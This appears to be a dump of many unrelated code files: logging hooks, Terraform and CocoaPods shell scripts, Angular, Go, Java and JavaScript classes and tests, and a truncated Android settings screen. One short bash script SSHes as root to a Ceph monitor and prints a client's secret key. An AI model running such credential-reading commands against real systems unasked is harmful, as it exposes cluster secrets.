ActiveSupport::Notifications.subscribe /etsource.loader/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
ActiveSupport::Notifications.subscribe /qernel.merit_order/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
ActiveSupport::Notifications.subscribe /gql\.query/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
ActiveSupport::Notifications.subscribe /gql\.inputs/ do |name, start, finish, id, payload|
GqlLogger.debug "#{name}: #{payload}"
end
# Global debug helper writing to log/debug.log.
def dbg(x)
DebugLogger.debug x
end
|
# Emits a Terraform stanza for an AWS subnet; REGION, NAME and VPC_ID are
# expanded from the caller's environment (the heredoc is intentionally
# unquoted so $VARS interpolate). No comments may go inside the heredoc —
# they would become part of the emitted Terraform.
terraform() {
cat <<EOF
provider "aws" {
region = "$REGION"
}
resource "aws_subnet" "$NAME" {
vpc_id = "$VPC_ID"
cidr_block = "10.0.1.0/24" # Replace with the desired CIDR block for the subnet
# Add any other necessary subnet configurations here
}
EOF
}
<reponame>divBis0/KodalySongDatabase
// Solfège on-screen keyboard configuration for the jQuery keyboard plugin:
// the normal layer types lowercase solfège letters (d r m f s l t) and the
// shift layer types the circled Unicode variants (Ⓓ…Ⓣ).
var ToneKeyboard = {};
jQuery(function($) {
ToneKeyboard.options = {
layout: 'custom',
customLayout: {
'normal' : [
// "n(a):title_or_tooltip"; n = new key, (a) = actual key, ":label" = title_or_tooltip (use an underscore "_" in place of a space " ")
'd(d):do r(r):re m(m):mi f(f):fa s(s):so l(l):la t(t):ti',
'{shift}'
],
'shift' : [
'\u24d3(D):circled_do(D) \u24e1(R):circled_re(R) \u24dc(M):circled_mi(M) \u24d5(F):circled_fa(F) \u24e2(S):circled_so(S) \u24db(L):circled_la(L) \u24e3(T):circled_ti(T)',
'{shift}'
]
},
css : {
container : 'ui-widget-content ui-widget ui-corner-all ui-helper-clearfix ui-tone_set-keyboard'
},
tabNavigation : true,
autoAccept : true,
usePreview: false // no preview
};
});
#!/usr/bin/env bash
# Fetch the cephx secret for client.u18-k8s by running `ceph auth print-key`
# on the monitor host over SSH (requires root SSH access to the monitor).
ceph_mon_ip=10.250.20.11
ceph_user=u18-k8s
ssh root@${ceph_mon_ip} ceph auth print-key client.${ceph_user}
|
import { Component, OnInit } from '@angular/core';
import { User, Video, UserStats } from 'src/app/models';
import { AdminService } from 'src/app/services';
@Component({
selector: 'admin-users-chart',
templateUrl: './admin-users-chart.component.html'
})
// Loads per-user statistics once on init; the template renders the chart.
export class AdminUsersChartComponent implements OnInit {
// Chart data; empty until the ngOnInit fetch resolves.
users: UserStats[] = [];
constructor(private adminService: AdminService) { }
async ngOnInit() {
// NOTE(review): Observable#toPromise is deprecated in newer RxJS (use
// firstValueFrom) — verify the project's RxJS version before changing.
this.users = await this.adminService.getUsersChart().toPromise();
}
}
|
<reponame>silentsoft/silentsoft-ui
package org.silentsoft.oss;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import org.junit.Assert;
import org.junit.Test;
import org.silentsoft.oss.license.BSD3ClauseLicense;
import org.silentsoft.oss.license.MITLicense;
// Guards NOTICE.md: regenerates the expected third-party notice markdown and
// asserts the committed file matches it exactly (lines joined with CRLF).
public class NoticeFileTest {
private static final License BSD_3_CLAUSE = new BSD3ClauseLicense();
private static final License MIT_LICENSE = new MITLicense();
@Test
public void noticeFileTest() throws Exception {
String markdown = generateSilentsoftUiNoticeMarkdown();
// Echo the generated notice so a mismatch is easy to diff from the log.
System.out.println("--------START OF THE NOTICE FILE--------");
System.out.println(markdown);
System.out.println("---------END OF THE NOTICE FILE---------");
Assert.assertEquals(markdown, readFile());
}
// Builds the expected notice content for this project's dependencies.
private String generateSilentsoftUiNoticeMarkdown() {
return NoticeFileGenerator.newInstance("silentsoft-ui", "silentsoft.org")
.addText("This product includes software developed by The Apache Software Foundation (http://www.apache.org/).")
.addLibrary("controlsfx 8.40.16", "https://github.com/controlsfx/controlsfx", BSD_3_CLAUSE)
.addLibrary("slf4j-api 1.7.25", "https://github.com/qos-ch/slf4j", MIT_LICENSE)
.generate();
}
// Reads NOTICE.md from the project root, joining lines with CRLF.
private String readFile() throws Exception {
return String.join("\r\n", Files.readAllLines(Paths.get(System.getProperty("user.dir"), "NOTICE.md"), StandardCharsets.UTF_8));
}
}
|
import { DocumentNode } from 'graphql';
import { GraphQLClient } from 'graphql-request';
import { print } from 'graphql/language/printer';
import { action, computed, observable, runInAction } from 'mobx';
import { AbortablePromise } from '../AbortablePromise';
// MobX-observable wrapper around a single GraphQL operation: tracks execution
// state, the last result and the last error, and aborts a still-running
// request when execute() is called again.
export class GraphQLRequest<TResult, TVariables> {
@observable public result: TResult | null = null;
@observable public isExecuting: boolean = false;
@observable public hasBeenExecutedAtLeastOnce: boolean = false;
@observable public error: Error | null = null;
@observable public execution: AbortablePromise<TResult, any> | null = null;
// True only during the very first in-flight execution (e.g. to show a
// full-page spinner instead of an inline refresh indicator).
@computed public get isExecutingTheFirstTime() {
return this.isExecuting && !this.hasBeenExecutedAtLeastOnce;
}
private client: GraphQLClient;
private query: DocumentNode;
constructor(client: GraphQLClient, query: DocumentNode) {
this.client = client;
this.query = query;
}
// Runs the query with the given variables. Resolves with the result, or
// null if this run was aborted (superseded by a newer execute() call);
// any other error is recorded in `error` and rethrown.
@action public async execute(variables: TVariables): Promise<TResult | null> {
// Cancel a previous in-flight run so only the latest result lands.
if (this.execution?.isExecuting) {
this.execution?.abort();
}
this.isExecuting = true;
this.execution = new AbortablePromise(
this.client.request(print(this.query), variables)
);
try {
const result = await this.execution;
runInAction(() => {
this.result = result;
this.error = null;
});
return result;
} catch (error) {
if (error === AbortablePromise.ABORT_ERROR) {
// Abort is not an error condition: clear state and report null.
runInAction(() => {
this.result = null;
this.error = null;
});
return null;
} else {
runInAction(() => {
this.result = null;
this.error = error;
});
throw error;
}
} finally {
runInAction(() => {
this.isExecuting = false;
this.hasBeenExecutedAtLeastOnce = true;
});
}
}
}
// Extracts the TVariables type argument from a GraphQLRequest instance type.
export type GraphQLRequestVariables<Request> = Request extends GraphQLRequest<
any,
infer Variables
>
? Variables
: never;
|
<filename>sync/sched.go
// @Author : Lik
// @Time : 2021/1/26
package main
import (
"runtime"
"sync"
)
// TestSchedDemo demonstrates cooperative scheduling: one goroutine counts
// 0..5 and yields the processor (runtime.Gosched) after printing 3, while
// three more goroutines each print a greeting. Blocks until all four finish.
func TestSchedDemo() {
	var wg sync.WaitGroup
	wg.Add(4)

	go func() {
		defer wg.Done()
		for i := 0; i < 6; i++ {
			println(i)
			if i == 3 {
				// Yield so other runnable goroutines get a turn.
				runtime.Gosched()
			}
		}
	}()

	for _, greeting := range []string{
		"Hello, World - 1",
		"Hello, World - 2",
		"Hello, World - 3",
	} {
		msg := greeting // capture per-iteration value for the closure
		go func() {
			defer wg.Done()
			println(msg)
		}()
	}

	wg.Wait()
}
|
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_outbond_twotone = void 0;
var ic_outbond_twotone = {
"viewBox": "0 0 24 24",
"children": [{
"name": "rect",
"attribs": {
"fill": "none",
"height": "24",
"width": "24",
"x": "0",
"y": "0"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M12,4c-4.41,0-8,3.59-8,8c0,4.41,3.59,8,8,8s8-3.59,8-8C20,7.59,16.41,4,12,4z M13.88,11.54l-4.96,4.96 l-1.41-1.41l4.96-4.96L10.34,8l5.65,0.01L16,13.66L13.88,11.54z",
"opacity": ".3"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M12,4c4.41,0,8,3.59,8,8s-3.59,8-8,8s-8-3.59-8-8S7.59,4,12,4 M12,2C6.48,2,2,6.48,2,12c0,5.52,4.48,10,10,10s10-4.48,10-10 C22,6.48,17.52,2,12,2L12,2z M13.88,11.54l-4.96,4.96l-1.41-1.41l4.96-4.96L10.34,8l5.65,0.01L16,13.66L13.88,11.54z"
},
"children": []
}]
};
exports.ic_outbond_twotone = ic_outbond_twotone; |
<filename>test/com/twu/biblioteca/CustomerTest.java
package com.twu.biblioteca;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import static org.hamcrest.core.Is.is;
import static org.junit.Assert.assertThat;
/**
* Created by alexa on 4/02/2019.
*/
// Tests for Customer: details formatting and library-number validation.
// ("<EMAIL>"/"<NAME>" are redacted fixture values from the source dump.)
public class CustomerTest {
Customer cust;
@Rule
public final ExpectedException failure = ExpectedException.none();
@Test
public void shouldPrintCustomerDetailsCorrectly() {
cust = new Customer("123-1234", "name", "0410123456", "<EMAIL>", "");
String expected =
"\n" +
"Library Number: 123-1234\n" +
"Name: name\n" +
"Phone: 0410123456\n" +
"Email: <EMAIL>\n" +
"\n";
assertThat(cust.printDetails(), is(expected));
}
@Test
public void shouldThrowWrongUserDetailsExceptionWithLibNumberError() {
cust = new Customer();
// NOTE(review): despite the test name, no exception is asserted here —
// the method simply returns false for a malformed library number.
assertThat(cust.checkLibNumberPattern("123-123"), is(false));
}
}
|
# ----------------------------------------------------------------------------
#
# Package : client-java-api
# Version : 6.0.1 / 8.0.0
# Source repo : https://github.com/kubernetes-client/java
# Tested on : UBI 8.5
# Language : Java
# Travis-Check : True
# Script License: Apache License, Version 2 or later
# Maintainer : Saurabh Gore <Saurabh.Gore@ibm.com>
#
# Disclaimer: This script has been tested in root mode on given
# ========== platform using the mentioned version of the package.
# It may not work as expected with newer versions of the
# package and/or distribution. In such case, please
# contact "Maintainer" of this script.
#
# ----------------------------------------------------------------------------
set -e
# NOTE(review): WORK_DIR is captured but never used below.
WORK_DIR=`pwd`
PACKAGE_NAME=java
PACKAGE_VERSION=${1:-client-java-parent-8.0.0}
PACKAGE_URL=https://github.com/kubernetes-client/java.git
# Install required dependencies
yum install -y git maven java-1.8.0-openjdk-devel
#Cloning repo
git clone $PACKAGE_URL
cd $PACKAGE_NAME/
git checkout $PACKAGE_VERSION
cd kubernetes
#Build without tests
mvn install -DskipTests
#To execute tests
if ! mvn test ; then
echo "------------------Build Success but test fails---------------------"
else
echo "------------------Build and test success-------------------------"
fi
|
#!/bin/bash
# Fix: the script uses bash-only constructs below ([[ ]], == inside [ ],
# ${PIPESTATUS[0]}) which are undefined under a POSIX /bin/sh (e.g. dash),
# so declare bash explicitly instead of /bin/sh.
set -e

echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
# Copies the framework named/pathed in $1 (resolved against BUILT_PRODUCTS_DIR,
# or used as-is) into the app's Frameworks folder, strips architectures not in
# VALID_ARCHS, embeds Swift runtime dylibs on Xcode < 7, and re-signs when
# code signing is enabled.
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# use filter instead of exclude so missing patterns dont' throw errors
echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Signs a framework with the provided identity
# No-op unless an identity is expanded and signing is required and allowed.
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements '$1'"
# Background the job when parallel signing is on; the script tail waits.
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
code_sign_cmd="$code_sign_cmd &"
fi
echo "$code_sign_cmd"
eval "$code_sign_cmd"
fi
}
# Strip invalid architectures
# Removes, in place, every architecture slice of $1 not listed in VALID_ARCHS.
strip_invalid_archs() {
binary="$1"
# Get architectures for current file
archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
stripped=""
for arch in $archs; do
if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/CSPhotos/CSPhotos.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/CSPhotos/CSPhotos.framework"
fi
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
wait
fi
|
<reponame>gitnooji/nj-kik-controller
'use strict';

// Specs for Bot#getUserProfile. nock stubs the Kik REST API, so no network
// access happens. Fix applied throughout: the original passed
// `(err) => { assert.fail(err); }` as a promise rejection handler — the
// throw from assert.fail was swallowed by the promise chain, so a failing
// request produced a timeout instead of a test failure. Failures are now
// routed through mocha's `done(err)`.
let nock = require('nock');
let request = require('supertest');
let assert = require('assert');
let Bot = require('../index.js');

const BOT_USERNAME = 'testbot';
const BOT_API_KEY = '2042cd8e-638c-4183-aef4-d4bef6f01981';

describe('Get user profile info', () => {
    it('fetches', (done) => {
        let bot = new Bot({
            username: BOT_USERNAME,
            apiKey: BOT_API_KEY,
            skipSignatureCheck: true
        });

        let engine = nock('https://api.kik.com')
            .get('/v1/user/testuser1')
            .reply(200, {
                firstName: 'Gwendolyn',
                lastName: 'Ferguson',
                profilePicUrl: 'https://randomuser.me/api/portraits/women/21.jpg',
                profilePicLastModified: 1458959883
            });

        bot.getUserProfile('testuser1')
            .then((profile) => {
                assert.equal(profile.username,
                    'testuser1');
                assert.equal(profile.displayName,
                    '<NAME>');
                assert.equal(profile.firstName,
                    'Gwendolyn');
                assert.equal(profile.lastName,
                    'Ferguson');
                assert.equal(profile.profilePicUrl,
                    'https://randomuser.me/api/portraits/women/21.jpg');
                assert.equal(profile.profilePicLastModified,
                    1458959883);
                done();
            })
            .catch(done); // report assertion or request errors instead of timing out
    });

    it('fetches multiple at the same time', (done) => {
        let bot = new Bot({
            username: BOT_USERNAME,
            apiKey: BOT_API_KEY,
            skipSignatureCheck: true
        });

        let engine = nock('https://api.kik.com')
            .get('/v1/user/testuser1')
            .reply(200, {
                firstName: 'Test',
                lastName: 'Guy',
            })
            .get('/v1/user/testuser2')
            .reply(200, {
                firstName: 'Test2',
                lastName: 'Guy',
            });

        bot.getUserProfile(['testuser1', 'testuser2'])
            .then((profiles) => {
                const profile1 = profiles[0];
                const profile2 = profiles[1];
                assert.equal(profile1.username, 'testuser1');
                assert.equal(profile1.displayName, 'Test Guy');
                assert.equal(profile1.firstName, 'Test');
                assert.equal(profile1.lastName, 'Guy');
                assert.equal(profile2.username, 'testuser2');
                assert.equal(profile2.displayName, 'Test2 Guy');
                assert.equal(profile2.firstName, 'Test2');
                assert.equal(profile2.lastName, 'Guy');
                done();
            })
            .catch(done);
    });

    it('fails when user does not exist', (done) => {
        let bot = new Bot({
            username: BOT_USERNAME,
            apiKey: BOT_API_KEY,
            skipSignatureCheck: true
        });

        let engine = nock('https://api.kik.com')
            .get('/v1/user/testuser12')
            .reply(404);

        bot.getUserProfile('testuser12')
            .then(() => {
                // Fix: assert.fail here was swallowed by the promise chain;
                // fail the test explicitly through done instead.
                done(new Error('Profile should not exist'));
            }, () => {
                done();
            });
    });

    it('can be converted to JSON after being fetched', (done) => {
        let bot = new Bot({
            username: BOT_USERNAME,
            apiKey: BOT_API_KEY,
            skipSignatureCheck: true
        });

        let engine = nock('https://api.kik.com')
            .get('/v1/user/testuser1')
            .reply(200, {
                firstName: 'Gwendolyn',
                lastName: 'Ferguson',
                profilePicUrl: 'https://randomuser.me/api/portraits/women/21.jpg',
                profilePicLastModified: 1458959883
            });

        bot.getUserProfile('testuser1')
            .then((profile) => {
                let json = profile.toJSON();
                assert.deepEqual(json, {
                    firstName: 'Gwendolyn',
                    lastName: 'Ferguson',
                    profilePicUrl: 'https://randomuser.me/api/portraits/women/21.jpg',
                    profilePicLastModified: 1458959883
                });
                done();
            })
            .catch(done);
    });
});
|
package modele;
/*
Enum: FillingType
------------------------------------------
Constants for the ship-filling algorithm's
distribution strategies.
Values: NAIVE, PACKET, LIFE_FOCUS, MORE_SPACE
*/
public enum FillingType {
    NAIVE,
    PACKET,
    LIFE_FOCUS,
    MORE_SPACE;

    /*
    Method: fromText(value)
    ------------------------------------------
    Converts a UI label into a constant the simulator can interpret.
    value (String): the text to parse
    returns: the matching constant, or null for an unknown label
    */
    public static FillingType fromText(String value) {
        switch(value) {
            case "Je réparti le matériel":
            case "chair à canon":
                return FillingType.NAIVE;
            case "Je bourre":
                return FillingType.PACKET;
            case "priorité vie humaine":
                return FillingType.LIFE_FOCUS;
        }
        return null;
    }

    /*
    Method: toText()
    ------------------------------------------
    Converts a constant back to its user-facing label.
    returns: the label, or null when the constant has no label
    */
    public String toText() {
        switch (this) {
            case NAIVE:
                return "Je réparti le matériel";
            case PACKET:
                return "Je bourre";
            case LIFE_FOCUS:
                // Fix: was missing, which broke fromText(x.toText())
                // round-trips for LIFE_FOCUS (returned null).
                return "priorité vie humaine";
        }
        // MORE_SPACE has no UI label in fromText; keep returning null for it.
        return null;
    }
}
#!/usr/bin/env python3
"""Echo each stdin line prefixed with a random score in [1.0, 101.0)."""
import random

while True:
    try:
        title = input()
    except EOFError:
        # Fix: the original crashed with an EOFError traceback once stdin
        # was exhausted; terminate the loop cleanly instead.
        break
    print("{0:.2f} {1}".format(random.uniform(1, 101), title))
|
<reponame>agus-setiawan-desu/brapi-Java-TestServer
package io.swagger.model.germ;
import java.util.Objects;
import com.fasterxml.jackson.annotation.JsonProperty;
import io.swagger.annotations.ApiModelProperty;
import org.springframework.validation.annotation.Validated;
/**
 * CrossParent
 *
 * Generated model (swagger-codegen) describing one parent of a cross:
 * the germplasm / observation unit involved and its role in the cross.
 * Regenerate from the OpenAPI specification rather than editing by hand.
 */
@Validated
@javax.annotation.Generated(value = "io.swagger.codegen.v3.generators.java.SpringCodegen", date = "2020-03-20T16:33:36.513Z[GMT]")
public class CrossParent {
    @JsonProperty("germplasmDbId")
    private String germplasmDbId = null;

    @JsonProperty("germplasmName")
    private String germplasmName = null;

    @JsonProperty("observationUnitDbId")
    private String observationUnitDbId = null;

    @JsonProperty("observationUnitName")
    private String observationUnitName = null;

    @JsonProperty("parentType")
    private ParentType parentType = null;

    // Fluent (builder-style) setter generated alongside the plain setter.
    public CrossParent germplasmDbId(String germplasmDbId) {
        this.germplasmDbId = germplasmDbId;
        return this;
    }

    /**
     * the unique identifier for a germplasm
     * @return germplasmDbId
     **/
    @ApiModelProperty(example = "d34b10c3", value = "the unique identifier for a germplasm")
    public String getGermplasmDbId() {
        return germplasmDbId;
    }

    public void setGermplasmDbId(String germplasmDbId) {
        this.germplasmDbId = germplasmDbId;
    }

    // Fluent (builder-style) setter.
    public CrossParent germplasmName(String germplasmName) {
        this.germplasmName = germplasmName;
        return this;
    }

    /**
     * the human readable name for a germplasm
     * @return germplasmName
     **/
    @ApiModelProperty(example = "TME_419", value = "the human readable name for a germplasm")
    public String getGermplasmName() {
        return germplasmName;
    }

    public void setGermplasmName(String germplasmName) {
        this.germplasmName = germplasmName;
    }

    // Fluent (builder-style) setter.
    public CrossParent observationUnitDbId(String observationUnitDbId) {
        this.observationUnitDbId = observationUnitDbId;
        return this;
    }

    /**
     * the unique identifier for an observation unit
     * @return observationUnitDbId
     **/
    @ApiModelProperty(example = "2e1926a7", value = "the unique identifier for an observation unit")
    public String getObservationUnitDbId() {
        return observationUnitDbId;
    }

    public void setObservationUnitDbId(String observationUnitDbId) {
        this.observationUnitDbId = observationUnitDbId;
    }

    // Fluent (builder-style) setter.
    public CrossParent observationUnitName(String observationUnitName) {
        this.observationUnitName = observationUnitName;
        return this;
    }

    /**
     * the human readable name for an observation unit
     * @return observationUnitName
     **/
    @ApiModelProperty(example = "my_Ibadan_Plot_9001", value = "the human readable name for an observation unit")
    public String getObservationUnitName() {
        return observationUnitName;
    }

    public void setObservationUnitName(String observationUnitName) {
        this.observationUnitName = observationUnitName;
    }

    // Fluent (builder-style) setter.
    public CrossParent parentType(ParentType parentType) {
        this.parentType = parentType;
        return this;
    }

    /**
     * The type of parent ex. 'MALE', 'FEMALE', 'SELF', 'POPULATION', etc.
     * @return parentType
     **/
    @ApiModelProperty(example = "MALE", value = "The type of parent ex. 'MALE', 'FEMALE', 'SELF', 'POPULATION', etc.")
    public ParentType getParentType() {
        return parentType;
    }

    public void setParentType(ParentType parentType) {
        this.parentType = parentType;
    }

    // Value equality over all five properties.
    @Override
    public boolean equals(java.lang.Object o) {
        if (this == o) {
            return true;
        }
        if (o == null || getClass() != o.getClass()) {
            return false;
        }
        CrossParent crossParent = (CrossParent) o;
        return Objects.equals(this.germplasmDbId, crossParent.germplasmDbId) &&
            Objects.equals(this.germplasmName, crossParent.germplasmName) &&
            Objects.equals(this.observationUnitDbId, crossParent.observationUnitDbId) &&
            Objects.equals(this.observationUnitName, crossParent.observationUnitName) &&
            Objects.equals(this.parentType, crossParent.parentType);
    }

    @Override
    public int hashCode() {
        return Objects.hash(germplasmDbId, germplasmName, observationUnitDbId, observationUnitName, parentType);
    }

    @Override
    public String toString() {
        StringBuilder sb = new StringBuilder();
        sb.append("class CrossParent {\n");
        sb.append("    germplasmDbId: ").append(toIndentedString(germplasmDbId)).append("\n");
        sb.append("    germplasmName: ").append(toIndentedString(germplasmName)).append("\n");
        sb.append("    observationUnitDbId: ").append(toIndentedString(observationUnitDbId)).append("\n");
        sb.append("    observationUnitName: ").append(toIndentedString(observationUnitName)).append("\n");
        sb.append("    parentType: ").append(toIndentedString(parentType)).append("\n");
        sb.append("}");
        return sb.toString();
    }

    /**
     * Convert the given object to string with each line indented by 4 spaces
     * (except the first line).
     */
    private String toIndentedString(java.lang.Object o) {
        if (o == null) {
            return "null";
        }
        return o.toString().replace("\n", "\n    ");
    }
}
|
// CSS selectors and DOM attribute names used by the scraper when parsing
// the performer search-results page.
module.exports = {
  // One entry per performer on the search-results page.
  PORNSTARS_LIST: '#pornstarsSearchResult li .wrap',
  // Sub-selectors evaluated relative to each PORNSTARS_LIST entry.
  pornstars_search_selectors: {
    ACTOR: '.title',
    VIDEO_NUMBER: '.videosNumber',
    VIEW_NUMBER: '.pstarViews',
    RANK: '.rank_number'
  },
  // Which DOM attribute to read for each extracted field; `null` means the
  // field is derived from element presence rather than an attribute, and
  // 'multi_textContent' means collect textContent from multiple nodes.
  // NOTE(review): the key name "attributs" (sic) is part of this module's
  // public interface — renaming it would break consumers; kept as-is.
  pornstars_element_attributs: {
    LINK: 'href',
    TITLE: 'title',
    HD: null,
    DURATION: 'innerHTML',
    VIEWS: 'innerHTML',
    PREMIUM: null,
    AUTHOR: 'innerHTML',
    RATINGS: 'innerHTML',
    RELATED_SEARCH: 'multi_textContent',
    RELATED_PORNSTARS: 'multi_textContent',
    ACTOR: 'innerHTML',
    VIDEO_NUMBER: 'innerHTML',
    VIEW_NUMBER: 'innerHTML',
    RANK: 'innerHTML'
  }
};
|
package top.yifan.template.exception;

import java.net.URI;

/**
 * ErrorConstants
 *
 * Shared error-key constants used when translating exceptions into
 * client-facing problem responses.
 *
 * @author star
 */
public final class ErrorConstants {

    // Message key reported when an optimistic-locking / concurrency conflict occurs.
    public static final String ERR_CONCURRENCY_FAILURE = "error.concurrencyFailure";

    // Message key reported for bean-validation failures.
    public static final String ERR_VALIDATION = "error.validation";

    // NOTE(review): null placeholder — no default problem-type URI has been
    // assigned yet; confirm consumers handle a null type before relying on it.
    public static final URI DEFAULT_TYPE = null;

    // Constants holder — not instantiable.
    private ErrorConstants() {
    }
}
package com.margsapp.messenger.Settings;
import android.app.Activity;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Configuration;
import android.os.Bundle;
import android.view.View;
import android.widget.ImageView;
import androidx.appcompat.app.AlertDialog;
import androidx.appcompat.app.AppCompatActivity;
import androidx.appcompat.app.AppCompatDelegate;
import androidx.cardview.widget.CardView;
import com.google.android.material.button.MaterialButtonToggleGroup;
import com.margsapp.messenger.R;
import java.util.Locale;
import java.util.Objects;
/**
 * Settings screen for appearance customisation: light/dark/system theme
 * (persisted in the "theme" SharedPreferences file) and app language
 * (persisted in "lang_settings").
 */
public class CustomiseActivity extends AppCompatActivity {

    // Key under which the theme choice is stored.
    // NOTE(review): the key is literally the string "0" — confusing, but kept
    // because existing installs already persist under this key.
    // Stored values: "0" = follow system, "1" = dark, "2" = light.
    public static final String THEME = "0";

    MaterialButtonToggleGroup materialButtonToggleGroup;
    ImageView sun, default_settings, moon;
    CardView lang_card;
    // Index of the currently selected language in the dialog list.
    int languageid;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_customize);
        sun = findViewById(R.id.sun_img);
        moon = findViewById(R.id.moon_img);
        default_settings = findViewById(R.id.default_img);
        // Start in the "system default" visual state; loadData() corrects it below.
        sun.setVisibility(View.GONE);
        moon.setVisibility(View.GONE);
        default_settings.setVisibility(View.VISIBLE);
        lang_card = findViewById(R.id.lang_card);
        SharedPreferences preferences = getSharedPreferences("lang_settings", Activity.MODE_PRIVATE);
        languageid = preferences.getInt("langid", 0);
        androidx.appcompat.widget.Toolbar toolbar = findViewById(R.id.toolbar);
        setSupportActionBar(toolbar);
        Objects.requireNonNull(getSupportActionBar()).setTitle(getResources().getString(R.string.customize));
        getSupportActionBar().setDisplayHomeAsUpEnabled(true);
        toolbar.setNavigationOnClickListener(v -> startActivity(new Intent(CustomiseActivity.this, edit_profile.class).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)));
        materialButtonToggleGroup = findViewById(R.id.btg_theme);
        materialButtonToggleGroup.check(R.id.btnDefault);
        // Restore persisted theme/language. Deliberately done BEFORE the
        // listener is attached so restoring state does not re-trigger writes.
        loadData();
        materialButtonToggleGroup.addOnButtonCheckedListener((group, checkedId, isChecked) -> {
            // NOTE(review): isChecked is ignored, so each toggle fires this
            // handler for both the newly-checked and the unchecked button —
            // verify this is intended before changing.
            if (checkedId == R.id.btnLight) {
                AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_NO);
                moon.setVisibility(View.GONE);
                sun.setVisibility(View.VISIBLE);
                default_settings.setVisibility(View.GONE);
                SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
                Editor editor = sharedPreferences.edit();
                editor.putString(THEME, "2");
                editor.apply();
            }
            if (checkedId == R.id.btnDark) {
                moon.setVisibility(View.VISIBLE);
                default_settings.setVisibility(View.GONE);
                sun.setVisibility(View.GONE);
                AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_YES);
                SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
                Editor editor = sharedPreferences.edit();
                editor.putString(THEME, "1");
                editor.apply();
            }
            if (checkedId == R.id.btnDefault) {
                moon.setVisibility(View.GONE);
                default_settings.setVisibility(View.VISIBLE);
                sun.setVisibility(View.GONE);
                AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_FOLLOW_SYSTEM);
                SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
                Editor editor = sharedPreferences.edit();
                editor.putString(THEME, "0");
                editor.apply();
            }
        });
        lang_card.setOnClickListener(v -> showLanguageDialog());
    }

    // Single-choice dialog listing the supported UI languages.
    private void showLanguageDialog() {
        final String[] langitems = {"English (Default)", "தமிழ்", "हिंदी", "తెలుగు"};
